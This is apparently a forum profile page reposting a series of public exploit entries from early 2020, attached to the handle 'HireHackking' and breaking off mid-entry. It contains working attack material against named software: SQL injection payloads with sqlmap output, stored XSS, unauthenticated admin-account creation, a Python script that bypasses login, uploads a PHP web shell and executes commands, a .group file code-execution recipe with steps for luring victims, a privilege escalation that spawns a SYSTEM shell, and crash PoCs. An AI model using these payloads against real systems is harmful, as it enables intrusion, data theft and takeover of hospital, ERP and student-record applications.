
Everything posted by HireHackking
-
MSN Password Recovery 1.30 - Denial of Service (PoC)
# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-02
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
# Exploit Author: Gokkulraj
# Tested Version: v1.30
# Tested on: Windows 7 x64

# 1.- Download and install MSN Password Recovery
# 2.- Run python code : MSN Password Recovery.py
# 3.- Open CRASH.txt and copy content to clipboard
# 4.- Open MSN Password Recovery and Click 'EnterKey'
# 5.- Paste the content of CRASH.txt into the Field: 'User Name and Registration Code'
# 6.- click 'OK' you will see a crash.

#!/usr/bin/env python
Dos = "\x41" * 9000
myfile = open('CRASH.txt', 'w')
myfile.writelines(Dos)
myfile.close()
print("File created")
-
Microsoft Windows .Group File - Code Execution
# Exploit Title: Microsoft Windows .Group File - Code Execution
# Date: 2020-01-01
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.microsoft.com
# Version: 1.9.6
# Tested on: Windows
# CVE : N/A

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] apparitionsec@gmail
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Windows ".Group" File Type

Group files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. It contains a list of contacts saved into a group, which can be used to create a mailing list for sending email messages to multiple addresses at once.

[Vulnerability Type]
URL Field Code Execution

[CVE Reference]
N/A

[Security Issue]
Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details" tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available.

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Therefore, attacker-supplied executables can run unexpectedly for the user, who thinks they are visiting a website when they click the Website Go button. Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is internet downloaded or copied from a network share.

This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain if not in the Contacts directory.

Advisory released for the sake of completeness and user security awareness.

[Exploit/POC]
1) create a Windows .group file
2) create a directory named "http"
3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com and place it in the "http" dir alongside the .group file.
4) point the website URL to the executable using path traversal like "http.\www.microsoft.com" which is the website address in the .group file.
   Note: the directory traversal can also point to other dirs like ..\Downloads\http.\microsoft.com but the downside is the URL looks very sketchy.
5) package it up in an archive .rar etc.
6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\<victim>\Contacts" directory.
7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder if not within that dir already) next click the website address go button.

The attacker's executable will run instead of navigating to a website as would be expected by an end user.

[Severity]
High

[Disclosure Timeline]
Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed.
January 1, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).

hyp3rlinx
-
Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
# Discovery Date: 2019-09-20
# Exploit Author: Hakan TAŞKÖPRÜ
# Vendor Homepage: http://karakuzu.info/
# Affected Version <= 5.7.0

Vulnerability #1: Unauthenticated SQL Injection
==================================================

Type: Error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND 1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))-- DhDH&k_yetki_duz=USER&kullanici_duzenle=

Type: Time-based blind
Title: Oracle AND time-based blind
Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND 6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)-- VuHD&k_yetki_duz=USER&kullanici_duzenle=

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle=

Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and k_sifre_duz parameters are injectable/vulnerable.

Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User Management Panel
=======================================================================================
Description : An attacker can steal an admin's cookie.

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)" autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=

Vulnerability #3: Unauthenticated Creating Admin User
======================================================
Description : An attacker can create an admin or normal account.

Request:
POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=

Vulnerability #4: Unauthenticated Deleting User
=============================================
Description : An attacker can delete an admin or normal account.

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

kullanici_sil=k_adi_duz=USERNAME_TO_DELETE

Vulnerability #5: Unauthenticated Editing User
===============================================
Description : An attacker can change a user's password or role (e.g. ROOT).

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle=

### History
=============
2019-09-20 Issue discovered
2019-11-19 Vendor contacted (No response)
2020-01-03 Issue published
-
Online Course Registration 2.0 - Remote Code Execution
# Exploit Title: Online Course Registration 2.0 - Remote Code Execution
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-course-registration-free-download/
# Version: v2.0
# Category: Webapps
# Tested on: Xampp for Windows
# Description: Attacker can bypass login page and access to student change password dashboard.

PoC Request (Authentication Bypass):

POST /onlinecourse/index.php HTTP/1.1
Host: target

regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit=

There isn't any file extension control in student panel "My Profile" section. An unauthorized user can upload php file as profile image.

First PoC Request (RCE):

POST /onlinecourse/my-profile.php HTTP/1.1
Host: target

-----------------------------16046344889164047791563222514
Content-Disposition: form-data; name="photo"; filename="simple.php"
Content-Type: application/x-php

<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>

Second PoC Request (RCE):

GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1
Host: target

Below basic python script will bypass authentication and execute command on target server.

import requests
import sys

if (len(sys.argv) != 3) or sys.argv[1] == "-h":
    print "[*] Usage: PoC.py rhost/rpath "
    print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
    exit(0)

rhost = sys.argv[1]
command = sys.argv[2]
url = "http://" + rhost + "/index.php"
data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
    # bypass authentication
    lg = login = session.post(url, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
    # check authentication bypass
    check = session.get("http://" + rhost + "/my-profile.php", allow_redirects=False)
    if check.status_code == 200:
        print "[+] Authentication bypass was successful"
    else:
        print "[-] Authentication bypass was unsuccessful"
        sys.exit()
    # upload simple php file
    files = {'photo': ('command.php', '<?php system($_GET["cmd"]); ?>')}
    fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
    furl = "http://" + rhost + "/my-profile.php"
    session.post(url=furl, files=files, data=fdata)
    # execution
    final = session.get("http://" + rhost + "/studentphoto/command.php?cmd=" + command)
    # check execution
    if final.status_code == 200:
        print "[+] Command execution completed successfully."
        print "\tPut on a happy face!\n"
    else:
        print "[-] Command execution was unsuccessful."
        sys.exit()
    print final.text
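As an added example that is not part of the post above, here is the login query in the string-concatenated form that the bypass relies on, next to a parameterized version, run against a constructed in-memory SQLite table with the post's `joke' or '1'='1'#` payload. SQLite has no `#` line comment, so the trailing `#` is dropped here (assumption: the `OR '1'='1'` tautology alone produces the bypass); the table, column names and credentials are invented.

```python
import sqlite3

# Constructed sample data; not the application's real schema or records.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (regno TEXT, password TEXT, name TEXT)")
    conn.execute("INSERT INTO students VALUES ('10806157', 'Pa55word', 'Test Student')")
    conn.commit()
    return conn

def login_concat(conn, regno, password):
    """Vulnerable form: user input is pasted straight into the SQL text,
    so a quote in the input ends the literal and the rest becomes SQL."""
    sql = ("SELECT name FROM students WHERE regno='" + regno +
           "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, regno, password):
    """Hardened form: placeholders keep the quote characters as data,
    so the same input is compared literally and matches nothing."""
    sql = "SELECT name FROM students WHERE regno=? AND password=?"
    row = conn.execute(sql, (regno, password)).fetchone()
    return row[0] if row else None

# The post's payload minus the MySQL-only '#' comment terminator (see lead-in).
PAYLOAD = "joke' or '1'='1"

def demo():
    """Run both forms with the payload and with real credentials."""
    conn = make_db()
    return {
        "concat_with_payload": login_concat(conn, PAYLOAD, PAYLOAD),
        "param_with_payload": login_parameterized(conn, PAYLOAD, PAYLOAD),
        "param_with_real_creds": login_parameterized(conn, "10806157", "Pa55word"),
    }
```

With the concatenated form the WHERE clause becomes `regno='joke' or '1'='1' AND password='joke' or '1'='1'`, which is true for every row; the parameterized form returns a row only for the real credentials.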
-
Hospital Management System 4.0 - 'searchdata' SQL Injection
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5192

# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.

================================
1 - SQLi
================================

POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://10.0.0.214
DNT: 1
Connection: close
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

searchdata=&search=

?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.

POST parameter 'searchdata' is vulnerable.
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
---
Parameter: searchdata (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
---
[15:49:58] [INFO] testing MySQL
[15:49:58] [INFO] confirming MySQL
[15:49:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.4.1
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:49:58] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

================================
2 - SQLi
================================

GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: viewid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
---
[15:54:21] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login

================================
3 - SQLi
================================

Parameter: bs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=

?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient

================================
4 - SQLi
================================

POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Origin: https://10.0.0.214
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

patname=

patname parameter is vulnerable to SQLi under the add patient in the doctor login

================================
5 - SQLi
================================

---
Parameter: cpass (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
---
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://10.0.0.214
DNT: 1
Connection: close
Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1

cpass=123&npass=123&cfpass=123&submit=123

the ?cpass parameter is vulnerable to blind SQL injection
-
Hospital Management System 4.0 - Persistent Cross-Site Scripting
# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5191

================
1. - Cross Site Scripting (Persistent)
================

URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
Method : POST
Parameter: doctorspecilization
Attack : </td><script>alert("XSS");</script><td>

POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://10.0.0.214
DNT: 1
Connection: close
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=

?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
-
BloodX 1.0 - Authentication Bypass
# Exploit Title: BloodX 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2019-12-31
# Vendor Homepage: https://github.com/diveshlunker/BloodX
# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description:
# A standalone platform which lets donors, receivers, organizers and sponsors merge.

# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'

# Proof of Concept: http://localhost//BloodX-master/login.php

POST /BloodX-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Referer: http://localhost/BloodX-master/login.php
Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu
Connection: keep-alive
Upgrade-Insecure-Requests: 1

email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
-
SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1.Download and install SpotFTP
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotFTP Crashed
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer

try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1.Download and install NetShareWatcher
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.NetShareWatcher Crashed
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer

try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Complaint Management System 4.0 - 'cid' SQL injection
# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.0
# Tested on: Windows 7
# CVE : N/A

Description:
The Complaint Management System v4.0 application from PHPgurukul is vulnerable to blind SQL injection via the 'cid' parameter which is found on the complaint-details.php page.

==========
1. SQLi
==========

SQLMAP POC:

GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
---

The ?cid parameter is vulnerable to sql injection within the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2

request:

GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
Upgrade-Insecure-Requests: 1
-
Plantronics Hub 3.13.2 - Local Privilege Escalation
# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation
# Date: 2020-01-2
# Exploit Author: Markus Krell - @MarkusKrell
# Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf
# Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe
# Version: Plantronics Hub for Windows prior to version 3.14
# Tested on: Windows 10 Enterprise
# CVE : N/A

As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory.
The content of MajorUpgrade.config should look like the following one liner:

<WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD>

Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. You may of course call any other binary you can plant on the machine.

Steps for exploitation (PoC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config
-
Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: N/A

# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
# SQL injection in multiple areas. The most severe of these is the username
# parameter on the login page as this injection can be done unauthenticated.

================================
'username' - SQLi
================================

POST /dfsms/index.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

username=test&password=test&login=

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'category' & 'categorycode' - SQLi
================================

POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

category=test&categorycode=test&submit=

---
Parameter: category (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

---
Parameter: categorycode (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'companyname' - SQLi
================================

---
Parameter: companyname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'productname' & 'productprice' - SQLi
================================

---
Parameter: productname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
---

---
Parameter: productprice (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'fromdate' & 'todate' - SQLi
================================

---
Parameter: todate (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=

Parameter: fromdate (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
